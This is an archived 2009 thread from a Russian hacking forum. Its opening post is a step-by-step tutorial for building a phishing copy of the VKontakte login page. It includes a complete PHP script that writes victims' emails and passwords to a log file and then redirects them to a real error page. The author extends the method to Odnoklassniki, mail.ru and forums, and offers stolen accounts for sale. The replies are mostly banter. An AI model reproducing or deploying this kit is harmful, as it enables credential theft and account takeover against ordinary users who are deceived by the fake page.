ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

03.01.2009, 01:41
|
|
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме: 3884427
Репутация:
766
|
|
Фейк на скорую руку
СТАТЬЯ БОЛЕЕ НЕ АКТУАЛЬНА!
Вбудущем, когда будит свободное время-напишу новую
Да, некоторые фейки можно скачать тут :http://nonz.name/?cat=53
[iNtrO]
Делать было нечаго,дело было вечером....Собственно на первую мою статью (первую на античате), потянул меня тот факт, что в разделе купи/продай/обменя/кинь по крупному есть тема, в которой один хеккер продовал фейки аж по 10 вмз, да и часто просят создать тот или иной фейк...
Я же расскажу одной статьей как можно забацать универсальный фейк почти подо все, что угондо! Покажу на примере фейка вконтакте.
[SeaRchINg]
И так, 1 что нам нужно, так это выбрать жертворесурс и собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на vkontakte.ru через Operu (!). Жмякаем кнопочку вход, попадаем на логин.пхп, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) " HTML Фаил с изображениями", и обезательно графу Имя Файла пишем index(или login.htm- в зависимости от страницы)
Далее вводим туда нереальные данные и попадаем на страницу, на которой написано
Такой почтовый адрес не зарегистрирован, либо пароль неверный.
Сохраняем ее точно так же, т олько вместо index пишем bad.
Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем Дополнительные результаты с vkontakte.ru » и ищим что-то связанное с эрором контакта... На вторйо страницы я нашел VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка
Усе, все что нам надо для фейка от ресурса, у нас уже есть.
[CoDiNg]
Такс, теперь иследуем форму логина. Открываем наш index.html и ищем форму входа.
Код:
<form method="post" name="login" id="login" action="login.php">
<input type="hidden" name="success_url" id="success_url" value="">
<input type="hidden" name="fail_url" id="fail_url" value="">
<input type="hidden" name="try_to_login" id="try_to_login" value="1">
<table align="center" cellpadding=0 cellspacing=7 border=0 width="40%">
<tr>
<td width="100px">
<span class="grey">Email:</span>
</td>
<td>
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
<td>
</tr>
<tr>
<td>
<span class="grey">Пароль:</span>
</td>
<td>
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
</td>
</tr>
<tr>
<td>
</td>
<td>
<input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /><small>Чужой компьютер</small>
</td>
</tr>
<tr>
<td>
</td>
<td>
Отсюда запоминаем 3 вещи:
1)
Код:
<form method="post" name="login" id="login" action="login.php">
2)
Код:
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
3)
Код:
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
Именно в этих 3 вещах заключаеться первая часть уникальности, на любой социалке или эмайле или еще где либо, везде форма входа(поля), будут в таком види (ну только название полей будит отличаться),к примеру у однокласников это
Код:
<input id="field_password" value="" style="width: 170px;" type="password" size="20" name="st.password">
Тоесть просто отличаеться название полей, элементами дизайна-но функция у всех одна и таже.
Теперь мы создаем пхп файл, и называем его к примеру login.php,его содержимое:
PHP код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['password'])){
fputs($f, $_POST['email'].";".$_POST['password']." \n");
header("Location: http://");
} else {
header("Location: http://");
}
flock($f,3);
fclose($f);
?>
Собственно смотрим на скрипт, пару строчег, но это вполне нормальный фейк,его функционал:
Сохранение передаваемых переменных,их проверка,редирект в зависимости от проверки.
И так, теперь возвращаемся к тем 3 строчкам:
1)
Код:
<form method="post" name="login" id="login" action="login.php">
тут у нас все в порядки,имя нашего скрипта совподает с именем ихнего, нобывает что и не совпадет, тогда заменяем его или же переиминовываем наш.
2)
Код:
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
Код:
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
Отсюда нам нужно name="email" и name="pass"
Вставляем их в наш скрипт в нужное место
PHP код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){
fputs($f, $_POST['email'].";".$_POST['pass']." \n");
header("Location: http://");
} else {
header("Location: http://");
}
flock($f,3);
fclose($f);
?>
Кто не заметил, это $_POST['email'] и $_POST['pass']
Далее смотрим скрип, тут стаит функция IF ELSE, и прегматч, тоесть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят ывпмдвгк), и поле пароль не пустое, то выполняеться первый редирект, если же эмаил не соответствует или поле пасс пустое, то на второй редирект. Из этого следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел херню (вот тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные данные), то кидаем его обратно, тоесть вписываем bad.htm.
Выглядит это так:
PHP код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){
fputs($f, $_POST['email'].";".$_POST['pass']." \n");
header("Location: http://vkontakte.ru/blank.php?code=10");
} else {
header("Location: bad.htm");
}
flock($f,3);
fclose($f);
?>
Сохраняем.Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777.
Вот и все
[THe eND]
Собственно что уникального, а то что вы можете зайти на на одноклассников, так же сохранить страницу,вписать переменные,заменить урлы( вот сразу даю http://odnoklassniki.ru/dk?st.cmd=error) и все, обсолютно так же зайти на майил.ру, сохранить переменные и заменить и все))) Единственное, что вам может понадобиться-это креативность, добустим сохранять не главную страницу, а страницу входа.Вы так же можете сделать любой форум, если вы допустим хотите получить акк(отправляете в пм
Код:
<a href="фейк">ссылка на тему</a>
, а в фейке указываете эту тему для редиректа.
Ну и в конце хочу добавить, если кто-то хочет купи акки социалок-стучити, цены актуальные)))
Последний раз редактировалось nonamez; 30.08.2009 в 14:10..
|
|
|

03.01.2009, 02:01
|
|
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме: 3248203
Репутация:
628
|
|
не.... букаф многа =)
pS:в избранное 
|
|
|

03.01.2009, 02:02
|
|
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме: 3884427
Репутация:
766
|
|
тут на пальцах расписано, что бы не возникало вопросов.
|
|
|

03.01.2009, 02:15
|
|
Участник форума
Регистрация: 08.03.2007
Сообщений: 191
Провел на форуме: 4081574
Репутация:
214
|
|
nonamez , шикарно , можно идти работать :]
|
|
|

03.01.2009, 02:16
|
|
Banned
Регистрация: 04.06.2008
Сообщений: 402
Провел на форуме: 2267346
Репутация:
719
|
|
бояно-боянисто-боянинестично-боянкобояиноый-боян
то есть подобные статьи видел уже раз 7
|
|
|

03.01.2009, 02:17
|
|
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме: 3248203
Репутация:
628
|
|
Сообщение от P3L3NG
бояно-боянисто-боянинестично-боянкобояиноый-боян
то есть подобные статьи видел уже раз 7
 это для моего возраста 
|
|
|

03.01.2009, 14:17
|
|
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме: 2544458
Репутация:
243
|
|
щас кто нибудь напишет: а как изменить адерес в браузере на странице фейка?...
|
|
|

03.01.2009, 15:16
|
|
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме: 4468361
Репутация:
1549
|
|
а как изменить адерес в браузере на странице фейка?...
ЗЫ
А что делать? Статья - борода. Как только автор может писать такое... не осилил ибо боян.
|
|
|

03.01.2009, 15:19
|
|
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме: 3884427
Репутация:
766
|
|
я уже заметил не раз что ты только пиздишь, а от самого никакого толка. Ты что-нибудь лучше сделай, а потом пизди.
|
|
|

03.01.2009, 15:52
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме: 1484154
Репутация:
126
|
|
изобретение велосипеда только скоростей тут многовато?
и не лень было писать ведь каждый хоть кто либо разбирающийся в кодинге сможет это сделать а кто не разбирается может просто попросить сделать.
научи лучше как сделать
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1230983426&rve r=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmail.live.co m%2Fdefault.aspx%3Fn%3D642107092&id=64855
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|